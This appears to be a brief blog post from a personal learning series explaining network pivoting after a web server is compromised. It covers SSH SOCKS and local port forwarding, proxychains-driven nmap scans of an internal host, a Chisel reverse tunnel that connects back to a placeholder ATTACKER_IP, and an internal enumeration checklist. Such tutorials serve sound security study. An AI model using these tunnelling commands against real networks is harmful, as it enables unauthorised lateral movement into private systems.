🛠️ The Art of the Pivot
Pivoting is the process of using a compromised system to attack other systems on the same internal network. If the Web Server has two network interfaces (Internet and LAN), it becomes our bridge.
1. SSH Dynamic Port Forwarding (The All-Rounder)
By using ssh -D 1080 user@target, I created a SOCKS proxy. Combined with Proxychains, I can now run any tool as if my computer is physically plugged into the internal network.
-
Command:
proxychains nmap -sT -Pn 192.168.1.10
2. Local Port Forwarding (The Specialist)
When I only need access to a specific internal service, like a database:
-
Command:
ssh -L 3306:192.168.1.10:3306 user@jump-box -
Result: I can now connect to the internal database by simply pointing my client to
127.0.0.1:3306.
3. Chisel: The Advanced Tunnel
In modern environments where SSH might be restricted or monitored, Chisel is a lifesaver. It creates an HTTP-based tunnel that can carry SOCKS traffic.
-
Attacker Side:
chisel server -p 8000 --reverse -
Target Side:
chisel client ATTACKER_IP:8000 R:1080:socks
🕵️♂️ Internal Enumeration Checklist
Once you land on the first box, look for:
-
Interfaces:
ip a(Look for 10.x.x.x or 172.x.x.x networks). -
ARP Cache:
arp -a(See who else this machine talks to). -
Active Connections:
netstat -tulnp(Find internal-only services).
Follow my journey: #1HourADayJourney
Top comments (0)